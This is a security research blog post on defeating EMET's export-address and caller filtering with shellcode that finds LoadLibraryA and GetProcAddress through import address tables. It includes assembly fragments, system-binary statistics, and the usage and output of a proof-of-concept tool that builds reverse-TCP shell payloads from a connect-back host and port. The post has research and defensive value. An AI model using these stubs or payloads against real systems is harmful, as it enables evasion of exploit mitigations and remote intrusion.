The EMET Serendipity: EMET's (In)Effectiveness Against Non-Exploitation Uses
TL;DR
This post discusses a method of bypassing Microsoft’s Enhanced Mitigation Toolkit (EMET) protections post Address Space Layout Randomization/Data Execution Prevention (ASLR/DEP) protections. The closer your position independent execution shellcode is to working like compiled code, the harder it will be to stop with bolt-on user-land protections. DEP/ASLR/SEH are still solid protections: all the additional protections are to stop people that can't write their own payloads. The production of the post was accelerated by a recent FireEye blog post that discusses these techniques in use.
Introduction
You might think: "EMET is made for exploit mitigation.” And you’re right, but it's presence has been felt outside the exploitation arena. It's been seen in places where users use position independent shellcode where compiled code would work, or where Metasploit sourced shellcode is typically used. Am I saying that EMET was written to stop Metasploit sourced shellcode? Yup. Pretty much. Outside of the DEP/ASLR protections, which are not exclusive to EMET, all the other protections can be bypassed if you can get past DEP. This is nothing new. Many blog posts and papers have discussed this subject, here are a few of my favorites (1, 2, 3, 4).
Problem Solving
I started down this path about two years ago when working on the Backdoor Factory (BDF). I was originally using Metasploit payloads in BDF, but there was a concern: if a user were to trust one of the patched executables, they could include it in EMET protected applications. At that point, caller and Exploit Address Table Filtering (EAF) protections would flag the binary during execution. It happens because Metasploit looks up each API via a JMP instruction (see Stephen Fewer’s Hash API Lookup Function). As you probably figured out, DEP and ASLR are not a concern when adding payloads to binaries because you can predict where you are with relative ease via relative virtual addressing (RVA) offsets. I ran across the Bromium Bypassing EMET 4.1 paper and decided to use the Import Table Thunks vs Kernel32 export table to find a stable way to call LoadLibraryA (LLA) and GetProcAddress (GPA) while bypassing EMET caller and EAF checks. This worked for binaries that had these APIs in their Import Address Table (IAT). About a year ago, I added Import Table patching in BDF. I would add a new section to the PE file, add new API calls in a ‘new’ Import Directory and point to older APIs in the old IAT. The lack of API issue was solved.
Around November 2014, I used this technique in exploitation, post info leak, DEP and ASLR bypass. I thought “Why not go from the Process Environment Block (PEB) to the loaded module, find the IAT, then find LLA/GPA and load all the APIs from there.” It actually worked well. I'm not the first to do it, the best example of this, though non-working, was in phrack issue 63 (2005-05-08). If you want to go to an even earlier example see this (03-Nov-2004). So, I wrote a version of this and tested it against EMET, where I disabled DEP in the EMET control graphical user interface (GUI) for the tested app, bypassing everything else. ASLR without DEP is nothing, they both tie together: if one falls so does the other. The technique is not a silver bullet to bypass EMET. As I mentioned earlier, you still need an information leak and you will need to ROP your way to the shellcode. Those two things are exploit dependent and I can find more exploits where this payload wouldn’t directly apply than where it would. So this shellcode sat, unloved, and alone in an unused Sublime Text tab growing lonely.
Renewed Interest
Until Feb 2016. When Casey Smith (subTee) tweeted the following:
You might have heard of Casey Smith, aka, Subtee. He knows a bit about bypassing whitelisting protections.
We decided to collaborate on this project. I posted the IAT parsing shellcode and he had a go at it. We agreed that if you are able to get code execution via non-exploitation, you could write out all the WinAPIs directly, and not even mess with shellcode. This includes Visual Basic for Applications (VBA), PowerShell, and even compiled code. Obvious is obvious. But what if you wanted to still use shellcode payloads because of their relative small size? One problem was is that PowerShell did not have LLA/GPA in it's IAT. Casey came up with the idea of using the IAT of another DLL loaded in that memory space. That means loading the target binary in a debugger, viewing the loaded DLLs in that processes memory space, then checking each DLL for the APIs that you need. On the other hand, I wanted to do this statically, and faster, so I decided to parse all system binaries (executables and DLLs) and map all the DLLs that they load in memory recursively and if they have LLA/GPA in it's memory space. So, I created VMs going from XPSP3, VISTA, Win7, Win8.1, and Win10 and ran a python script enumerating each and saving the output. I did not include wow64 in the output as the output to x64 system32 should be similar.
The output of the number of system binaries (exes and DLLS) that have LLA/GPA in its IAT.
XPSP3: 1300/5426
VISTA: 645/26855
Win7: 675/48383
Win8: 324/31158
Win10: 225/50522
You see a huge drop in Vista, a slight uptick in Win7, then a steady drop in Win8 and Win10. Which is great. So this potential technique of finding LLA/GPA in an IAT should get harder. However, there is one DLL that is eventually loaded into the executable process space of many modern programs and that is ADVAPI32.DLL. Have a look at it's exposed APIs and you will understand why it's everywhere. And, LLA/GPA is in its IAT. Good for us!
Thanks EMET
Let’s say in the target executable process space, there are no DLLs that have LLA or GPA in any of their IATs. However, if the process is protected by EMET, EMET.dll will be loaded into that process space. The EMET DLL has LLA/GPA in its import address table! The reason is to load dbghelp.dll and to execute the MiniDumpWriteDump API call!
So we have our POC and it works as follows:
Find PEB
Use part of Stephen Fewer’s API ROR function to compare just the DLL name to find the DLL we are looking for
Then find the IAT (like our IAT parser) and our associated APIs
With our parser, LLA and GPA API handles will be in EBX and ECX, respectively
By using this IAT parsing approach we defeat a couple protections that are included in the HAVOC protection of DLL!API hash collisions, which was discussed in the most recent POC||GTFO (12.7). Although we use just the named DLL hash itself, I found zero collisions among the DLL names in system32. I suppose someone could inject DLLs into the process space to cause
collisions at the DLL name itself. But, that would be more work as you would need all the possible DLL names possible with LLA/GPA in it’s process space.
Taking it one step further, we looked at the IAT footprint and how we could still use the IAT without both LLA/GPA present. We considered that only one API was needed —GPA— but we need to bypass EAF/Caller checks if we work off the Export table of Kernel32. How can we do it? If you have GPA, you'll need Kernel32 module handle to call GetProcAddress (Kerneral32handle, LoadLibraryA). Afterwards you'll have LoadLibraryA in EAX and you'll can't call that handle directly. Here is where understanding how the IAT works comes into the picture.
When you compile a modern windows PE binary, an Import Table is created and the API thunks are populated at binary load time. So, when the compiled code calls APIs off of the IAT, it's calling the address that the thunk points to. We need to do the same to beat the caller EMET protection.
Here’s how we did it:
Find PEB
Get the GPA API thunk address from the target DLL IAT
USE PEB to get kernel32 via the kernel32 DLL hash
Use GPA to get the handle to LLA
Then implement a pointer to the LLA handle via the stack - LLA is in eax register
push eax ; Push LLA handle on the stack
mov ebx, esp ; Move the ptr to LLA on the stack in ebx
Now you can call LLA via `call word ptr [ebx]`
If you look at the footprint of just GPA in system executables and DLLs you find the following:
XPSP3: 1999/5426
VISTA: 1512/26855
Win7: 1727/48383
Win8: 1164/31158
Win10: 843/50522
Again, a drop along the same lines as with both LLA/GPA, but you see that GPA is still prevalent in Windows 10.
If you had to choose the workflow for your target binary, I would choose the following in order:
Use the IAT of the main module for LLA/GPA
Use the GPA of the main module to find LLA
Use the IAT of a loaded module for LLA/GPA
Use the GPA of a loaded module to find LLA
I implemented this decision tree in a POC script. It also parses the loaded modules imports to find what will be loaded at runtime, if necessary, and will pick a DLL from that list to parse it’s IAT. The stubs can be taken and applied to other payloads that you care to write, just realize that the prototype puts LLA and GPA in EBX and ECX respectively. And this is x86 only. Also, the stubs interact with a reverse tcp cmd shell without an exit function, so it will crash after successful connection back, this is by design (write your own).
The POC
Our POC includes all the system executables and DLLs that have the IAT or GPA in it’s IAT from system32 for winXP through win10.
Usage:
[[{"fid":"17871","view_mode":"default","type":"media","field_deltas":{"1":{}},"fields":{},"attributes":{"height":"144","width":"2260","class":"media-element file-default","data-delta":"1"}}]]
Command line arguments explained:
PE_Binary: target executable you want to generate a payload for
HOST: Connect back IP
PORT: Connect back port
Operating system: pick one (winXP, winVista, win7, win8, win10)
Force_EMET_HASH: If LLA/GPA is not in the target executable IAT it will use them from EMET (True/False)
Force_Loaded_module: Force using a loaded module IAT for LLA/GPA vs the target exe IAT
Examples:
======
$ ./iat_poc.py handle.exe 127.0.0.1 8080 win8 False False
[*] Loading PE in pefile
[*] Parsing data directories
[*] Found API getprocaddress
[*] GetProcAddress API was found!
[*] DLLs in the import table: set(['ADVAPI32.dll', 'KERNEL32.dll', 'COMDLG32.dll', 'GDI32.dll', 'USER32.dll'])
[*] Using GPA IAT parsing stub
[*] Payload length: 489
[snip]
[output]
======
$ ./iat_poc.py handle.exe 127.0.0.1 8080 win10 False True
[*] Loading PE in pefile
[*] Parsing data directories
[*] Found API getprocaddress
[*] GetProcAddress API was found!
[*] DLLs in the import table: set(['ADVAPI32.dll', 'KERNEL32.dll', 'COMDLG32.dll', 'GDI32.dll', 'USER32.dll'])
[*] Checking win10 compatibility
[*] Number of lookups to do: 52270
[*] Checking for its imported DLLs: COMDLG32.dll
[*] COMDLG32.dll adds the following not already loaded dll: msvcrt.dll
[*] COMDLG32.dll adds the following not already loaded dll: ntdll.dll
[*] COMDLG32.dll adds the following not already loaded dll: SHLWAPI.dll
[*] COMDLG32.dll adds the following not already loaded dll: COMCTL32.dll
[*] COMDLG32.dll adds the following not already loaded dll: SHELL32.dll
[*] COMDLG32.dll adds the following not already loaded dll: FirewallAPI.dll
[*] COMDLG32.dll adds the following not already loaded dll: NETAPI32.dll
[*] Checking for its imported DLLs: emet.dll
[*] Checking for its imported DLLs: GDI32.dll
[*] Checking for its imported DLLs: KERNEL32.dll
[*] KERNEL32.dll adds the following not already loaded dll: KERNELBASE.dll
[*] Checking for its imported DLLs: ADVAPI32.dll
[*] ADVAPI32.dll adds the following not already loaded dll: SECHOST.dll
[*] ADVAPI32.dll adds the following not already loaded dll: RPCRT4.dll
[*] Checking for its imported DLLs: USER32.dll
[*] Checking for its imported DLLs: COMDLG32.dll
[*] Checking for its imported DLLs: KERNEL32.dll
[*] Checking for its imported DLLs: msvcrt.dll
[*] Checking for its imported DLLs: NETAPI32.dll
[*] Checking for its imported DLLs: ntdll.dll
[*] Checking for its imported DLLs: SHELL32.dll
[*] Checking for its imported DLLs: RPCRT4.dll
[*] RPCRT4.dll adds the following not already loaded dll: SspiCli.dll
[*] Checking for its imported DLLs: COMCTL32.dll
[*] Checking for its imported DLLs: FirewallAPI.dll
[*] Checking for its imported DLLs: emet.dll
[*] Checking for its imported DLLs: KERNELBASE.dll
[*] Checking for its imported DLLs: GDI32.dll
[*] Checking for its imported DLLs: ADVAPI32.dll
[*] Checking for its imported DLLs: SHLWAPI.dll
[*] Checking for its imported DLLs: SECHOST.dll
[*] Checking for its imported DLLs: USER32.dll
[*] Parsing imported dlls complete
[*] Possible useful loaded modules: set(['COMDLG32.dll', 'KERNEL32.dll', u'msvcrt.dll', u'NETAPI32.dll', u'RPCRT4.dll', u'SHELL32.dll', u'ntdll.dll', u'COMCTL32.dll', u'FirewallAPI.dll', 'emet.dll', u'KERNELBASE.dll', 'GDI32.dll', u'SspiCli.dll', 'ADVAPI32.dll', u'SHLWAPI.dll', u'SECHOST.dll', 'USER32.dll'])
[*] Looking for loadliba/getprocaddr or just getprocaddr in COMDLG32.dll
-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\comdlg32.dll
[*] Looking for loadliba/getprocaddr or just getprocaddr in KERNEL32.dll
[snip]
The output is a raw shellcode binary written to disk and a python byte format written to stdout in the console. For those that are wondering, we avoid using the KERNEL32.dll IAT.
In Closing
We were planning on submitting these ideas to a security conference, but after the the FireEye report of the Angler Exploit Kit abusing these concepts, we felt that that ship had sailed. EMET has raised the level of effort for exploit development by eliminating the days of copy and paste exploitation writing. However, if the exploit conditions are right, it only provides a speed bump to those that can write their own shellcode, and get that shellcode closer to compiled code. For example, Casey was able to bypass EMET protections in Excel and PowerShell using these techniques while deploying shellcode in his crafted whitelisting attacks. We have provided enough information for those that want to take our shellcode stubs in the POC and build out their own payloads.
If you want to create a HAVOC like protection against just the GPA method of LLA resolution you would need to inject a DLL into the process space, as the first loaded module, that collides with the kernel32 hash itself. Again, enumerating against all possible DLLs with LLA/GPA in the process space could be difficult, not impossible, because of unknown DLLs shipped with programs that might have these two APIs.